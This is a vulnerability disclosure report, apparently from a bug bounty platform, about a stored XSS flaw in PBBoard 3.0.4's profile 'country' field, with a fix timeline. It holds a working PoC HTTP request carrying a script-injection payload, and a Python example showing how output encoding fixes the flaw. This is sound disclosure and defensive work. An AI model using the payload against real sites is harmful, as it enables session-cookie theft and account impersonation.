Stored XSS in Edit user member profile in pbboard/pbboard-3.0.4

Valid

Reported on

Apr 4th 2023


Description

When a user updates their personal information, the `country` parameter accepts an XSS payload; the value is stored with the profile and later rendered without output encoding.

Step 1: Update the user's personal information with the payload in the `country` field.

Proof of Concept

// PoC request:  
// payload: "><script>alert(String.fromCharCode(88,83))</script>

POST /pbboard/index.php?page=usercp&control=1&info=1&start=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 241
Origin: http://localhost
Connection: close
Referer: http://localhost/pbboard/index.php?page=usercp&control=1&info=1&main=1
Cookie: eid=2; download_started=0; PHPSESSID=dngclv00c2khlomtdkccv6vfh2; PowerBB_username=tuanth; PowerBB_password=32298fc135b3fecf012a4c27efbba188; PowerBB_lastvisit=1680611668; plupload_ui_view=thumbs
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

birth_date=14-4-2005&country=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%29%29%3C%2Fscript%3E&gender=m&website=&info=%5C%5C%5C%5C%5C%5C%5C%22%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29&away=0&away_msg=1&send=Save+settings


Step 2: Open a post by the user whose profile was edited.

Step 3: The XSS alert is shown.
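The defect class behind this report, shown as an added example rather than PBBoard's own code: the stored `country` value is placed into an HTML attribute, and a value starting with `">` closes the attribute and the tag. The form body is copied from the PoC above; the two template strings and the helper names are assumptions made for the example. The check parses the rendered markup the way a browser tokenizer would and confirms that the hardened template yields exactly one `input` element whose `value` round-trips unchanged, while the vulnerable template yields an extra `script` element.

```python
"""Stored XSS in a profile field: vulnerable vs. hardened rendering.

Added example, not PBBoard's code. Reproduces the defect class the report
describes (profile value echoed into an attribute without encoding) and
the fix (HTML-encode the value, including quotes, at output time).
"""
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs

# Request body copied from the PoC in the report (application/x-www-form-urlencoded).
POC_BODY = (
    "birth_date=14-4-2005"
    "&country=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%29%29%3C%2Fscript%3E"
    "&gender=m&website="
    "&info=%5C%5C%5C%5C%5C%5C%5C%22%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29"
    "&away=0&away_msg=1&send=Save+settings"
)


def parse_profile_form(body: str) -> dict:
    """Decode the form body into a flat dict (first value per field)."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def render_vulnerable(country: str) -> str:
    """Assumed vulnerable template: the stored value is interpolated verbatim."""
    return f'<input type="text" name="country" value="{country}">'


def render_hardened(country: str) -> str:
    """Hardened template: encode & < > and both quote characters, so a
    leading `"` becomes &quot; and can no longer terminate the attribute."""
    return f'<input type="text" name="country" value="{html.escape(country, quote=True)}">'


class TagCollector(HTMLParser):
    """Records every start tag with its (already entity-decoded) attributes."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list[tuple[str, dict]] = []

    def handle_starttag(self, tag: str, attrs) -> None:
        self.tags.append((tag, dict(attrs)))


def parse_tags(markup: str) -> list[tuple[str, dict]]:
    """Return the [(tag, attrs), ...] sequence a tokenizer sees in `markup`."""
    collector = TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags


def renders_safely(render, value: str) -> bool:
    """True when rendering `value` produces exactly one <input> whose value
    attribute equals the original string, i.e. nothing escaped the attribute."""
    tags = parse_tags(render(value))
    return len(tags) == 1 and tags[0][0] == "input" and tags[0][1].get("value") == value


if __name__ == "__main__":
    fields = parse_profile_form(POC_BODY)
    payload = fields["country"]
    for name, render in (("vulnerable", render_vulnerable), ("hardened", render_hardened)):
        print(f"{name:10s} safe={renders_safely(render, payload)} "
              f"tags={[t for t, _ in parse_tags(render(payload))]}")
```

The same encoding rule applies wherever a profile field is rendered (post headers, member lists, the edit form itself); encoding only `<` and `>` is not enough for attribute context because the quote character is what ends the attribute.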

Impact

XSS can cause serious issues. Attackers often leverage XSS to steal session cookies and impersonate the user.

We are processing your report and will contact the pbboard/pbboard-3.0.4 team within 24 hours. 8 months ago
TuanTH modified the report 8 months ago
We have contacted a member of the pbboard/pbboard-3.0.4 team and are waiting to hear back 8 months ago
PBBoard Forum Software validated this vulnerability 8 months ago

The bug was successfully fixed.

TuanTH has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
PBBoard Forum Software marked this as fixed in 3.0.4 with commit c391ca 8 months ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
PBBoard Forum Software published this vulnerability 8 months ago
TuanTH (Researcher), 8 months ago


I checked that the XSS vulnerability in the profile has been fixed.
